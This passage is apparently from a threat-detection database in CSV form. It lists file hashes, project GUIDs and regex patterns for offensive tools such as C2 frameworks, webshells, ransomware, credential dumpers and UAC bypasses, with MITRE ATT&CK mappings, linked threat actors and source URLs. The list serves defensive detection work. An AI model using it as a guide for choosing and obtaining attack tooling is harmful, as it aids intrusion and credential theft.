"*b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb*",".{0,1000}b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34453" "*b0dfaa9226786fa467d758760aa766da96b58baac3e7fa446c6870959d6c4602*",".{0,1000}b0dfaa9226786fa467d758760aa766da96b58baac3e7fa446c6870959d6c4602.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34456" "*b0e02a08da80d249cd96bda183d2910fc02c55ffa72cae261496d520e857a5ed*",".{0,1000}b0e02a08da80d249cd96bda183d2910fc02c55ffa72cae261496d520e857a5ed.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34457" "*b0e1039ae0d67bf914c268cfb9ca01b11aaa76a7af1560cf16ca5b52ecff0f96*",".{0,1000}b0e1039ae0d67bf914c268cfb9ca01b11aaa76a7af1560cf16ca5b52ecff0f96.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","34458" "*b0e4d0a411c1fcf8dad9ca13c9e69660f6f10079d4db982db2167a457ec1e2ce*",".{0,1000}b0e4d0a411c1fcf8dad9ca13c9e69660f6f10079d4db982db2167a457ec1e2ce.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","34459" "*b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451*",".{0,1000}b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34460" "*b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453*",".{0,1000}b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34461" "*b1082c41fdd489f5b40bb413e94a37f86f30a0665771f2d1c36943d9f0cfe06e*",".{0,1000}b1082c41fdd489f5b40bb413e94a37f86f30a0665771f2d1c36943d9f0cfe06e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34464" "*b10dd21ee337c753a9056e9ac2c0b5d6912a5a39e7ef1ee618a91297286e4d39*",".{0,1000}b10dd21ee337c753a9056e9ac2c0b5d6912a5a39e7ef1ee618a91297286e4d39.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34466" "*b11b6028e75a3bcbe194770f9613181009aaf40bdd23892e12e0ce32bbe90cfb*",".{0,1000}b11b6028e75a3bcbe194770f9613181009aaf40bdd23892e12e0ce32bbe90cfb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34469" "*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#filehash","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","34470" "*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","34471" "*b12ada1dcac400d11a462a62ec3957adbdb82a4bfb04cef08533281bdbf286a5*",".{0,1000}b12ada1dcac400d11a462a62ec3957adbdb82a4bfb04cef08533281bdbf286a5.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - 
TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","34475" "*b138168e6c3df7f29121c84965648fea150456bc7f532cac39ec180d11aba33f*",".{0,1000}b138168e6c3df7f29121c84965648fea150456bc7f532cac39ec180d11aba33f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34477" "*B138FFBA-1076-4B58-8A98-67B34E8A7C5C*",".{0,1000}B138FFBA\-1076\-4B58\-8A98\-67B34E8A7C5C.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#GUIDproject","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","34478" "*b1505d27a4a0eda62dc0b193d635f01998e927e21b61dfcb7cb0e6c721a1cf65*",".{0,1000}b1505d27a4a0eda62dc0b193d635f01998e927e21b61dfcb7cb0e6c721a1cf65.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","34481" "*b15de7b31497b070c3dcca0797cf38a75d828ef8ea76762d315ec876dec2e2c4*",".{0,1000}b15de7b31497b070c3dcca0797cf38a75d828ef8ea76762d315ec876dec2e2c4.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - 
T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34483" "*b16cdc0e46842b871c8beca3caebb6aa33ce0d8404b787f053dd31511c919fa3*",".{0,1000}b16cdc0e46842b871c8beca3caebb6aa33ce0d8404b787f053dd31511c919fa3.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","34485" "*b16e8bce64a834cf8b7844989a67ea4a7da36227034b54a864be9dfe1ce076e5*",".{0,1000}b16e8bce64a834cf8b7844989a67ea4a7da36227034b54a864be9dfe1ce076e5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34486" "*b1705ed5733748745497767e2a4855893131f76cbb4b28a58fddf89fa679b27b*",".{0,1000}b1705ed5733748745497767e2a4855893131f76cbb4b28a58fddf89fa679b27b.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","34487" "*b17179a11cd25646af11ea28051b799bdacfe9fac6d66f2cf6e8dc1e4888916d*",".{0,1000}b17179a11cd25646af11ea28051b799bdacfe9fac6d66f2cf6e8dc1e4888916d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34488" "*b17483ad91b189bd4ec7229fe188155f8c8deecb00a44c1016f1e1f36d454689*",".{0,1000}b17483ad91b189bd4ec7229fe188155f8c8deecb00a44c1016f1e1f36d454689.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34489" "*B1865FC0-5605-4587-9FCB-8B9DF6B5C6B1*",".{0,1000}B1865FC0\-5605\-4587\-9FCB\-8B9DF6B5C6B1.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","34493" "*b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a*",".{0,1000}b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34494" "*b18aca1b9e2a9e72cb77960c355d288b*",".{0,1000}b18aca1b9e2a9e72cb77960c355d288b.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","34495" "*b18d778b4e4b6bf1fd5b2d790c941270145a6a6d*",".{0,1000}b18d778b4e4b6bf1fd5b2d790c941270145a6a6d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","34496" "*b1906ee99c71103357472e4ec7710f973a3283178611af0b7c4b6e78b0687639*",".{0,1000}b1906ee99c71103357472e4ec7710f973a3283178611af0b7c4b6e78b0687639.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34497" "*B1952AB299560820661C7D76EF8BCF224EBA551C2F5111525428E7F2CEA0AF9A*",".{0,1000}B1952AB299560820661C7D76EF8BCF224EBA551C2F5111525428E7F2CEA0AF9A.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","34499" "*b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865*",".{0,1000}b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865.{0,1000}","offensive_tool_keyword","fscan","Vulnerability 
scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","34500" "*B19E7FDE-C2CB-4C0A-9C5E-DFC73ADDB5C0*",".{0,1000}B19E7FDE\-C2CB\-4C0A\-9C5E\-DFC73ADDB5C0.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#GUIDproject","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","34504" "*b1a86d6a5da383a5b86ec8d5a8e49555a233b08079edcc3f31da1b996d008c7b*",".{0,1000}b1a86d6a5da383a5b86ec8d5a8e49555a233b08079edcc3f31da1b996d008c7b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34506" "*b1b5ef389275906c96e2326deb09d4eb6576fc692d8425ed0779a3acf3e1ab1b*",".{0,1000}b1b5ef389275906c96e2326deb09d4eb6576fc692d8425ed0779a3acf3e1ab1b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","34510" 
"*b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650*",".{0,1000}b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34511" "*b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa*",".{0,1000}b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34513" "*B1CB9A30-FEA6-4467-BEC5-4803CCE9BF78*",".{0,1000}B1CB9A30\-FEA6\-4467\-BEC5\-4803CCE9BF78.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","34515" "*b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67*",".{0,1000}b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67.{0,1000}","offensive_tool_keyword","chisel","A fast 
TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34518" "*b1dfc417ce748ffeec95311109dae13142c638e58cfa86eb6e5a0865082428aa*",".{0,1000}b1dfc417ce748ffeec95311109dae13142c638e58cfa86eb6e5a0865082428aa.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","34520" "*b1e0d02889530da4663fd9e0b3e324fb1325fe944dcdbc8d0fbf63d0f3d0c3e5*",".{0,1000}b1e0d02889530da4663fd9e0b3e324fb1325fe944dcdbc8d0fbf63d0f3d0c3e5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34521" "*b1e9925fa0a268182267f3f1d77837ed9e5ac11a342aeb8ad293b37f0ca725e5*",".{0,1000}b1e9925fa0a268182267f3f1d77837ed9e5ac11a342aeb8ad293b37f0ca725e5.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34523" "*b1f614b7eb188e8b7d47f08e333e05704aae24220409ab4e7e7b9fc03d339fdc*",".{0,1000}b1f614b7eb188e8b7d47f08e333e05704aae24220409ab4e7e7b9fc03d339fdc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34524" "*b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e*",".{0,1000}b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34525" "*b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd*",".{0,1000}b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34526" "*b203229777ddc5db664f3d0bfba24bc7416f234139a22b2b326fa3fc49dd13cd*",".{0,1000}b203229777ddc5db664f3d0bfba24bc7416f234139a22b2b326fa3fc49dd13cd.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34527" "*b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb*",".{0,1000}b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb.{0,1000}","offensive_tool_keyword","ZipExec","A 
unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","#filehash","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","34528" "*b20ef2d01915d91f5da22ad05e14dfa7f04af3c457d3267b2882a8cd9f560faa*",".{0,1000}b20ef2d01915d91f5da22ad05e14dfa7f04af3c457d3267b2882a8cd9f560faa.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","34529" "*b20f667c2539954744ddcb7f1d673c2a6dc0c4a934df45a3cca15a203a661c88*",".{0,1000}b20f667c2539954744ddcb7f1d673c2a6dc0c4a934df45a3cca15a203a661c88.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. 
Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","34530" "*b220de41dd61f8477fff83c8930a8a1759c3c1cb3da593698136b79f37ba01b9*",".{0,1000}b220de41dd61f8477fff83c8930a8a1759c3c1cb3da593698136b79f37ba01b9.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","34531" "*b22850c4a39e5abf07c8e91b943cd477f31a21dc6942801e58d756782cfbc095*",".{0,1000}b22850c4a39e5abf07c8e91b943cd477f31a21dc6942801e58d756782cfbc095.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","34532" "*b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401*",".{0,1000}b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 